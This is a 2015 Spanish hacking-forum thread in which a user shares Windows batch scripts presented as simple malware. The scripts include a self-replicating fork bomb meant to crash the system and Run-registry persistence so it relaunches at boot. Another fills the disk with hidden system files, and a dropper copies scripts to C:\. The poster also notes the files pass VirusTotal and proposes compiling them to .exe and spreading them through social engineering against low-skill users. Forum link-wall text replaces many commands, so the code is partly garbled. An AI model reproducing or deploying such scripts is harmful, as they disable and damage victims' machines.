comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Malware sencillo

  • 3 Respuestas
  • 2569 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Enero 07, 2015, 07:41:11 am »
Buenas a todos os traigo un malware sencillo hecho en batch.

Archivo won.bat:

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. :va
  3. start won.bat
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta va
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta
  6.  

Esto lo que hace es abrir muchas veces ese mismo archivo (que a su vez abriria otra vez el mismo archivo) hasta que colapse el sistema, el problema que esto asi esta muy feo, entonces se crea este otro archivo.

Archivo registro.bat:

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  4. start won.bat
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta
  6.  

Este segundo archivo modifica el registro para que cuando se abra windows se abra el archivo directamente, y despues se abre el archivo (por si lo borra)

PD: Si abre desde modo seguro no se abrira el archivo.
PD2: Según vt los dos archivos están limpios.

EDITO

Hay una tercera opción, seria hacerlo todo en un solo archivo.

Archivo won.bat:

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta lugar=%CD%\won.bat
  3. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%" /f
  4. :va
  5. start won.bat
  6. No tienes permisos para ver links. Registrate o Entra con tu cuenta va
  7. No tienes permisos para ver links. Registrate o Entra con tu cuenta
  8.  

EDITO 2

Otra forma de  hacerlo en un solo archivo

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta lugar=%CD%\won.bat
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta lugar1=%CD%\hola.txt
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta %lugar1% (No tienes permisos para ver links. Registrate o Entra con tu cuenta va) No tienes permisos para ver links. Registrate o Entra con tu cuenta (No tienes permisos para ver links. Registrate o Entra con tu cuenta install)
  5. :install
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. No tienes permisos para ver links. Registrate o Entra con tu cuenta hola > hola.txt
  8. :va
  9. start "won.bat"
  10. No tienes permisos para ver links. Registrate o Entra con tu cuenta va
  11. No tienes permisos para ver links. Registrate o Entra con tu cuenta
  12.  

EDITO 3

Otro codigo que lo que hace es ir llenandonos poco a poco la memoria del disco duro.

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. :bucle
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta N=%random%%random%%random%.txt
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta  >> %N%
  5. attrib +r +s +h %N%.txt
  6. No tienes permisos para ver links. Registrate o Entra con tu cuenta bucle

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. :bucle
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta N = 0
  4. start a.bat
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta N = %N%+1
  6. No tienes permisos para ver links. Registrate o Entra con tu cuenta %N% == 50 (No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta) No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta bucle
  7. :No tienes permisos para ver links. Registrate o Entra con tu cuenta
  8. No tienes permisos para ver links. Registrate o Entra con tu cuenta

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. No tienes permisos para ver links. Registrate o Entra con tu cuenta a.abt C:\
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta b.abt C:\
  4. No tienes permisos para ver links. Registrate o Entra con tu cuenta C:\
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta lugar=%CD%\b.bat
  6. REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v IniciarProgramas /t REG_SZ /d "%lugar%"
  7. start b.bat
  8. No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Enero 20, 2015, 08:08:46 pm por rollth »

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado DeBobiPro

  • *
  • Underc0der
  • Mensajes: 210
  • Actividad:
    8.33%
  • Reputación 2
  • Como no sabía que era imposible, lo hice.
    • Ver Perfil
« Respuesta #1 en: Enero 07, 2015, 09:18:31 am »
yo una vez hice uno así, pero le agregue lo siguiente

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2. :va
  3. msg * <algún mensaje>
  4. start won.bat
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta va
  6. No tienes permisos para ver links. Registrate o Entra con tu cuenta
  7.  

así salta el mensaje por cada vez que se abre , una tontera la verdad jaja


Saludos bro!

Nivel 77 No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado OnTheCore

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
« Respuesta #2 en: Enero 07, 2015, 11:50:02 pm »
Vamos, eso no es malware, es un script molesto nada mas.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #3 en: Enero 08, 2015, 07:45:21 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Vamos, eso no es malware, es un script molesto nada mas.

Hombre  el malware es software que produce daños sin consentimiento del usuario, si en en lugar de bat lo compilas en un .exe (libreria <stdlib.h> en c y la funcion system("")) con un poco de ingenieria social puede llegar a ser muy molesto para un usuario de bajos conocimientos.

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

 

¿Te gustó el post? COMPARTILO!



Malware "con" CriptoWall

Iniciado por blackdrake

Respuestas: 11
Vistas: 5268
Último mensaje Junio 16, 2018, 03:09:02 pm
por KiddArabic
theZoo - Repositorio de malware para análisis e investigación

Iniciado por ANTRAX

Respuestas: 5
Vistas: 1703
Último mensaje Febrero 19, 2018, 08:34:57 pm
por Lautaro Culic'
Otra modalidad malware para conocer de PowerPoint

Iniciado por xhc1

Respuestas: 2
Vistas: 1945
Último mensaje Agosto 23, 2017, 12:58:51 pm
por M03's
FlareVM - Maquina Virtual para analizar Malware

Iniciado por xyz

Respuestas: 1
Vistas: 901
Último mensaje Enero 07, 2018, 12:43:25 pm
por K A I L
Faking network para Análisis Dinámico de Malware.

Iniciado por cnfs

Respuestas: 3
Vistas: 2219
Último mensaje Enero 30, 2015, 02:32:23 pm
por cnfs